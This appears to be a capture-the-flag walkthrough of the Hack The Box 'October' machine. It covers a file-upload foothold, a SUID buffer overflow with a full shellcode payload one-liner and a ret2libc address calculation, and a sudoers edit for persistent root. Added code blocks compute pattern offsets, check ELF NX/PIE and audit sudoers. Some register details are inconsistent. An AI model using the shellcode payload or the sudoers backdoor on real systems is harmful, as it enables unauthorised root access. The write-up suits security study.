October — HTB Walkthrough

ENUMERATION

Nmap Scan

Port 80 HTTP Enumeration

Visiting the website, I found a login and register page.
Backend folder found
Auth Page
We see that we can upload malicious content using any of these.

EXPLOITATION

Uploading the file with the changes described above.

Getting shell as www-data
Getting User.txt

PRIVILEGE ESCALATION

Looking for SUID binaries

On target machine
On your machine
We receive a segmentation fault at 0x64413764.
We find this value at offset 112.
Checking the value in the EIP register, we see it is filled with Bs.
It hits
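
To show how the offset 112 follows from the crash address 0x64413764, here is an added example (my own code, not from the walkthrough): it rebuilds the Metasploit-style cyclic pattern (uppercase, lowercase, digit triplets) and searches for the little-endian bytes that landed in EIP, which is the computation the pattern_offset tool performs. The pattern length of 5000 is an assumption; a value that is not found at all means EIP was not overwritten by the pattern and the crash needs a closer look.

```python
# Added example, not from the original walkthrough: derive the overwrite
# offset from the value that ended up in EIP after sending a cyclic pattern.
import string
import struct


def cyclic_pattern(length: int) -> bytes:
    """Return the first `length` bytes of the Aa0Aa1...Zz9 pattern."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += f"{upper}{lower}{digit}".encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(crash_eip: int, length: int = 5000) -> int:
    """Locate the 4 bytes that filled EIP inside the pattern.

    EIP holds a little-endian 32-bit value, so it is unpacked to bytes in
    memory order before searching. Returns -1 when the bytes are not part
    of the pattern, i.e. the register was not overwritten by our input.
    """
    needle = struct.pack("<I", crash_eip)   # 0x64413764 -> b"d7Ad"
    return cyclic_pattern(length).find(needle)


if __name__ == "__main__":
    # Crash address reported on the page: EIP = 0x64413764
    print(pattern_offset(0x64413764))   # 112
    print(pattern_offset(0x41414141))   # -1: "AAAA" never occurs in the pattern
```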

4) Shellcode

Using msfvenom, we create the shellcode.

5) Sending payload

Using some padding, we send our shellcode and the offset as a payload. For this we write shell.py.

We see that EIP is overwritten with A's.
python -c 'offset = 112;shell="";shell +="\xdb\xde\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1\x12\xbf\xff\xee\x16";shell +="\x49\x83\xee\xfc\x31\x7e\x13\x03\x81\xfd\xf4\xbc\x4c\xd9\x0e";shell +="\xdd\xfd\x9e\xa3\x48\x03\xa8\xa5\x3d\x65\x67\xa5\xad\x30\xc7";shell +="\x99\x1c\x42\x6e\x9f\x67\x2a\x7b\x55\x96\xba\x13\x6b\xa6\xab";shell +="\xbf\xe2\x47\x7b\x59\xa5\xd6\x28\x15\x46\x50\x2f\x94\xc9\x30";shell +="\xc7\x49\xe5\xc7\x7f\xfe\xd6\x08\x1d\x97\xa1\xb4\xb3\x34\x3b";shell +="\x70\x39\xd4\xbf";nop = "\x90"*(offset - len(shell));eip = "\xe4c\xfd\x95\xbf";payload = nop + shell + eip;print(payload);'
ASLR was enabled.
NX was enabled.
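
The two mitigations hit here, a non-executable stack and address randomisation, are things an auditor can read off a binary before it ever ships. The following is an added example (my own code, not from the walkthrough or the box): a minimal checksec-style reader that parses the ELF program headers to report whether the binary asks for NX (a PT_GNU_STACK header without the PF_X flag) and whether it is position independent (e_type == ET_DYN, the prerequisite for ASLR to move the main image). It handles both ELF32 and ELF64, and the sample images it checks are constructed in the block, not real binaries.

```python
# Added example, not from the original walkthrough: read NX and PIE status
# straight from the ELF headers of a binary.
import struct

PT_GNU_STACK = 0x6474E551    # program header that declares the stack's permissions
PF_X = 0x1                   # executable bit in p_flags
ET_EXEC, ET_DYN = 2, 3       # fixed-address executable vs. position-independent image
EM_386 = 3


def elf_mitigations(data: bytes) -> dict:
    """Report NX and PIE for an ELF image held in memory.

    NX: a PT_GNU_STACK header is present and lacks PF_X. On x86 Linux a
    missing PT_GNU_STACK means an executable stack, so "absent" is reported
    as NX disabled. PIE: e_type is ET_DYN (shared objects also report True).
    """
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    bits = 32 if data[4] == 1 else 64
    endian = "<" if data[5] == 1 else ">"
    if bits == 32:
        ehdr_fmt = endian + "HHIIIIIHHH"   # e_type .. e_phnum of Elf32_Ehdr
        phdr_fmt = endian + "IIIIIIII"     # Elf32_Phdr: p_type ... p_flags p_align
        type_idx, flags_idx = 0, 6
    else:
        ehdr_fmt = endian + "HHIQQQIHHH"   # e_type .. e_phnum of Elf64_Ehdr
        phdr_fmt = endian + "IIQQQQQQ"     # Elf64_Phdr: p_type p_flags p_offset ...
        type_idx, flags_idx = 0, 1
    (e_type, _machine, _version, _entry, e_phoff, _shoff, _flags,
     _ehsize, e_phentsize, e_phnum) = struct.unpack_from(ehdr_fmt, data, 16)

    nx = False
    for i in range(e_phnum):
        ph = struct.unpack_from(phdr_fmt, data, e_phoff + i * e_phentsize)
        if ph[type_idx] == PT_GNU_STACK:
            nx = not (ph[flags_idx] & PF_X)
    return {"bits": bits, "nx": nx, "pie": e_type == ET_DYN}


def check_file(path: str) -> dict:
    """Convenience wrapper for a binary on disk."""
    with open(path, "rb") as f:
        return elf_mitigations(f.read())


def build_sample_elf32(nx: bool, pie: bool, with_stack_header: bool = True) -> bytes:
    """Constructed header-only ELF32 image for testing (not a runnable binary)."""
    e_ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + bytes(8)   # 32-bit, little-endian, v1
    ehsize, phentsize = 52, 32
    phnum = 1 if with_stack_header else 0
    ehdr = e_ident + struct.pack(
        "<HHIIIIIHHHHHH",
        ET_DYN if pie else ET_EXEC, EM_386, 1, 0x8048000,
        ehsize, 0, 0, ehsize, phentsize, phnum, 0, 0, 0)
    if not with_stack_header:
        return ehdr
    flags = 0x6 if nx else 0x7   # R|W stack vs. R|W|X stack
    phdr = struct.pack("<IIIIIIII", PT_GNU_STACK, 0, 0, 0, 0, 0, flags, 0x10)
    return ehdr + phdr


if __name__ == "__main__":
    for nx, pie in ((False, False), (True, True)):
        print(nx, pie, elf_mitigations(build_sample_elf32(nx, pie)))
```

On a Linux host, `check_file("/bin/ls")` runs the same parser over a real binary. Note that neither flag says anything about the kernel side: NX still needs hardware and kernel support, and ASLR is a system setting (`/proc/sys/kernel/randomize_va_space`) that PIE merely makes applicable to the main executable.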

Calculation

system = 0xb7582000 (libc base) + 0x40310 (offset of system in libc) = 0xB75C2310

Getting ROOT Flag

POST EXPLOITATION

Since we have the privilege to open and modify files as ROOT, we add ourselves to /etc/sudoers so that we don't need a password to run sudo, and then run su to switch to ROOT.
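
A defender-side check for this step, added here as an example (my own code, not from the walkthrough): it parses a sudoers file and flags password-less grants for principals that are not on an allowlist, which is exactly the entry this post-exploitation step leaves behind. The allowlist, the regular expression and the sample sudoers file are my own constructions; the parser covers plain user specifications only and does not expand aliases or follow include directives.

```python
# Added example, not from the original walkthrough: flag NOPASSWD grants in
# a sudoers file that do not belong to an expected principal.
import re

# Matches one sudoers user specification, e.g.
#   www-data ALL=(ALL) NOPASSWD: ALL
#   deploy   ALL=(root) NOPASSWD: /usr/bin/systemctl restart app
_RULE = re.compile(
    r"^\s*(?P<who>[%+]?[\w.@-]+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z_]+:\s*)*)"
    r"(?P<cmds>.+?)\s*$"
)
_SKIP = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")


def audit_sudoers(text: str, allowed: set) -> list:
    """Return NOPASSWD grants whose principal is not in `allowed`.

    Each finding records the line number, the principal (user, %group or
    +netgroup), the commands, and whether the grant is unrestricted
    (commands == ALL), the shape of the entry described on the page.
    Include directives (#include, @include) are not followed.
    """
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()   # drop comments and #include lines
        if not line or line.startswith(_SKIP):
            continue
        m = _RULE.match(line)
        if not m:
            continue
        if "NOPASSWD:" not in m.group("tags").upper():
            continue
        who, cmds = m.group("who"), m.group("cmds").strip()
        if who not in allowed:
            findings.append({"line": lineno, "who": who, "cmds": cmds,
                             "unrestricted": cmds.upper() == "ALL"})
    return findings


# Constructed sample (not a real host's file).
SAMPLE_SUDOERS = """\
# constructed sample sudoers
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart app
www-data ALL=(ALL) NOPASSWD: ALL
#includedir /etc/sudoers.d
"""

if __name__ == "__main__":
    # "deploy" is the only account expected to hold a password-less grant here.
    for finding in audit_sudoers(SAMPLE_SUDOERS, allowed={"deploy"}):
        print(finding)
```

Run it over /etc/sudoers and every file under /etc/sudoers.d on hosts you administer, and pair it with a file-integrity or audit rule on those paths: a web-service account such as www-data holding `NOPASSWD: ALL` is never legitimate and is the first thing this kind of intrusion leaves behind.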


Dhanishtha Awasthi

OSCP | CEH | Cyber Security Enthusiast.